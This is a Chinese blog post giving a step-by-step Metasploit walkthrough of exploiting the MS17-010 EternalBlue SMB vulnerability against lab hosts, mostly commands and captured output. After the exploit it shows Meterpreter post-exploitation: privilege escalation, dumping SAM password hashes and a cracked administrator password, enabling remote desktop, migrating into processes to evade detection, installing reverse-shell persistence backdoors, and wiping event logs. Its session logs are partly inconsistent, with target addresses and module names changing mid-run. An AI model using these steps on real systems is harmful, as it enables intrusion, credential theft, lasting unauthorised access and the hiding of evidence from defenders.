MS17-010远程溢出漏洞(CVE-2017-0143)

描述

继2016年 8 月份黑客组织 Shadow Brokers 放出第一批 NSA “方程式小组”内部黑客工具后,2017 年 4 月 14 日,Shadow Brokers 再次公布了一批新的 NSA 黑客工具,其中包含了一个攻击框架和多个 Windows 漏洞利用工具。攻击者利用这些漏洞可以远程获取 Windows 系统权限并植入后门。

针对此次泄露的漏洞,微软提前发布了安全公告 MS17-010,修复了泄露的多个 SMB 远程命令执行漏洞。由于此次泄露的漏洞覆盖了大部分常见的 Windows 版本(包括微软不再提供更新服务的 Windows XP 和 Windows Server 2003),网络空间中仍然存在大量可被入侵的设备

永恒之蓝漏洞是通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

 

漏洞影响

Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

目前在Metasploit上集成的攻击载荷是ms17_010_psexec和ms17_010_eternalblue

 

环境准备:

1.防火墙允许SMB流量进出

2.缺少MS17-010补丁

 

信息收集

 

nmap -sV --script=vuln -O 192.168.110.100

 

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|          
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
 

 

 

 

漏洞利用:

root@kali:~# msfconsole

 

确认漏洞

msf > search ms17-010 //在漏洞库中搜索ms17-010的payload
[!] Module database cache not built yet, using slow search
 
Matching Modules
================
 
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

我们使用auxiliary辅助模块中的ms17_010_command载荷去扫描确认目标系统是否真的有SMB服务的远程代码执行的漏洞

msf > use auxiliary/admin/smb/ms17_010_command    //使用该载荷
msf auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.135.136   //设置目标
rhosts => 192.168.135.136
msf auxiliary(admin/smb/ms17_010_command) > exploit  //进行攻击
 
[*] 192.168.135.136:445   - Target OS: Windows Server 2003 3790 Service Pack 2
[*] 192.168.135.136:445   - Filling barrel with fish... done
[*] 192.168.135.136:445   - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.135.136:445   -     [*] Preparing dynamite...
[*] 192.168.135.136:445   -         Trying stick 1 (x64)...Miss
[*] 192.168.135.136:445   -         [*] Trying stick 2 (x86)...Boom!
[*] 192.168.135.136:445   -     [+] Successfully Leaked Transaction!
[*] 192.168.135.136:445   -     [+] Successfully caught Fish-in-a-barrel
[*] 192.168.135.136:445   - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.135.136:445   - Reading from CONNECTION struct at: 0x8fdf1cb0
[*] 192.168.135.136:445   - Built a write-what-where primitive...
[+] 192.168.135.136:445   - Overwrite complete... SYSTEM session obtained!
[+] 192.168.135.136:445   - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.135.136:445   - Output for "net group "Domain Admins" /domain":
ةĻ     Domain Admins
עˍ     ָ¶¨µœꝀ
 
³ʔ±
 
-------------------------------------------------------------------------------
Administrator           
ļ®³ɹ¦Ϊ³ɡ£
 
 
[+] 192.168.135.136:445   - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Successful 而且目标为Administrator 权限

攻击目标

msf auxiliary(admin/smb/ms17_010_command) > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.110.100 //设置目标
rhost => 192.168.110.100
msf5 exploit(windows/smb/ms17_010_eternalblue) > run 

[*] Started reverse TCP handler on 192.168.110.100:4444 
[*] 192.168.110.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.110.128:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.110.128:445   - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.110.128:445 - Connecting to target for exploitation.
[+] 192.168.110.128:445 - Connection established for exploitation.
[+] 192.168.110.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.110.128:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.110.128:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70  Windows 7 Enterp
[*] 192.168.110.128:445 - 0x00000010  72 69 73 65 20 37 36 30 30                       rise 7600       
[+] 192.168.110.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.110.128:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.110.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.110.128:445 - Starting non-paged pool grooming
[+] 192.168.110.128:445 - Sending SMBv2 buffers
[+] 192.168.110.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.110.128:445 - Sending final SMBv2 buffers.
[*] 192.168.110.128:445 - Sending last fragment of exploit packet!
[*] 192.168.110.128:445 - Receiving response from exploit packet
[+] 192.168.110.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.110.128:445 - Sending egg to corrupted connection.
[*] 192.168.110.128:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.110.128
[*] Meterpreter session 1 opened (192.168.110.100:4444 -> 192.168.110.128:49455) at 2020-03-31 16:25:08 +0800
[+] 192.168.110.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.110.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.110.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 

成功

后渗透阶段

先介绍一下Meterpreter:

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpretershell的链接。Meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。最后,Meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。

在后渗透阶段我们将使用Meterpreter进行攻击

meterpreter > help        //输入help命令可以查看在meterpreter模块下执行的命令
meterpreter > sysinfo      //查看系统信息
Computer        : MYCOMPUTER
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Domain          : LOUISNIE
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getsystem   //提升到system权限
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
 
meterpreter > hashdump  //导出SAM数据库的内容
Administrator:500:570ce399da1412abaad3b435b51404ee:b9d2d4955b330b503cc792eb6a55bb1f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:98e07fb45acadfe5febbf70690d16ae0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:18861c2baa27b5a9100c04acbbfa47d9:::
IUSR_MYCOMPUTER:1108:e2e508b31b1336d2c996f97338db8790:03320631cb387004f82daec52f03935f:::
IWAM_MYCOMPUTER:1109:fc512ee6de7b912f77747be12787d540:0f8f47aec1c4bc8897a81bce48cc20da:::
MYCOMPUTER$:1005:aad3b435b51404eeaad3b435b51404ee:979f58fb772361956a63f2bc34036a09:::

 

SAM简介:

SAM是windows系统的一个系统用户账号管理文件。其全称为security account manager。Windows中对用户账户的安全管理使用了安全账号管理器SAM(security account manager)的机制,安全账号管理器对账号的管理是通过安全标识进行的,安全标识在账号创建时就同时创建,一旦账号被删除,安全标识也同时被删除。安全标识是唯一的,即使是相同的用户名,在每次创建时获得的安全标识都时完全不同的。因此,一旦某个账号被删除,它的安全标识就不再存在了,即使用相同的用户名重建账号,也会被赋予不同的安全标识,不会保留原来的权限。

其文件位置:C:\windows\system32\config\SAM

其格式是 用户名称:RID:LM-HASH值:NT-HASH:::

在Windows系统下,有两大hash,分别是LM HASH&NT HASH

对于NT HASH,我们直接可以在cmd5网站进行解密,解密Administrator用户密码为redhat

msf exploit(windows/smb/ms17_010_psexec) >run post/windows/manage/enable_rdp //打开目标服务器的远程连接
 
msf exploit(windows/smb/ms17_010_psexec) >exploit
meterpreter > portfwd add -l 2222 -r 192.168.135.136 -p 3389  //反弹目标的3389端口到本地的2222端口并监听该端口
[*] Local TCP relay created: :2222 <-> 192.168.135.136:3389
meterpreter > portfwd    //查看是否反弹成功
 
Active Port Forwards
====================
 
   Index  Local         Remote                Direction
   -----  -----         ------                ---------
   1      0.0.0.0:2222  192.168.135.136:3389  Forward
 
1 total active port forwards.
 
root@kali:~# netstat -an | grep "2222"  //我们在kali查看2222端口是在监听状态
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN    
root@kali:~# rdesktop 127.0.0.1:2222 //连接本地的2222端口反弹到目标的3389端口,即打开目标的桌面
 
meterpreter > ps  //查看系统进程
 
Process List
============
 
 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                               
 4     0     System             x86   0        NT AUTHORITY\SYSTEM          
 240   2792  mstsc.exe          x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\mstsc.exe
 264   4     smss.exe           x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 292   808   explorer.exe       x86   0        LOUISNIE\Administrator        C:\WINDOWS\Explorer.EXE
 312   264   csrss.exe          x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 336   264   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 384   336   services.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 396   336   lsass.exe          x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 452   1744  wuauclt.exe        x86   2        LOUISNIE\Administrator        C:\WINDOWS\system32\wuauclt.exe
 588   384   vmacthlp.exe       x86   0        NT AUTHORITY\SYSTEM
 
meterpreter > migrate 292 //将该会话和系统进程绑定,免杀.格式是:migrate PID
 
meterpreter > execute -H -i -f cmd.exe //创建新进程cmd.exe,-H不可见,-i交互 -f用系统命令去执行
 
meterpreter > kali 1569  //杀死进程,格式是:kali PID

植入后门,维持控制

msf exploit(windows/smb/ms17_010_psexec) > sessions  -i 2  //开启第二个会话
[*] Starting interaction with 2...
 
meterpreter > run persistence - X -i 5 -p 4445 -r 192.168.135.136 //运行后门程序,-X指定启动的方式为开机自启动,-i反向连接的时间间隔
 
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/MYCOMPUTER_20190219.3953/MYCOMPUTER_20190219.3953.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.135.136 LPORT=4445
[*] Persistent agent script is 99670 bytes long
 
meterpreter > background
[*] Backgrounding session 2...
msf exploit(windows/smb/ms17_010_psexec) > back
msf > use exploit/multi/handler    //使用exploit/multi/handler监听连入的backdoor
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp  //设置载荷
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.135.134  //设置将反弹到本地来
lhost => 192.168.135.134
msf exploit(multi/handler) > exploit
 
[*] Started reverse TCP handler on 192.168.135.134:4444
[*] Sending stage (179779 bytes) to 192.168.135.136
[*] Sleeping before handling stage...
[*] Meterpreter session 3 opened (192.168.135.134:4444 -> 192.168.135.136:2364) at 2019-02-19 21:42:12 +0800
[*] Sending stage (179779 bytes) to 192.168.135.136
[*] Sleeping before handling stage...
[*] Meterpreter session 4 opened (192.168.135.1

或者可以使用metsvc模块来留下后门

metsvc后渗透攻击模块其实就是将Meterpreter以系统服务的形式安装到目标主机,它会上传三个文件:

  • metsvc.dll

  • metsvc-service.exe

  • metsvc.exe

    msf exploit(multi/handler) > sessions -i 2 //选择一个会话
    meterpreter > run metsvc //运行metsvc

     

    清除日志:

    meterpreter > clearev
    [*] Wiping 1 records from Application...
    [*] Wiping 26 records from System...
    [*] Wiping 2281 records from Security..

     

posted @ 2019-11-08 16:55  西二旗老实人  阅读(4404)  评论(2编辑  收藏  举报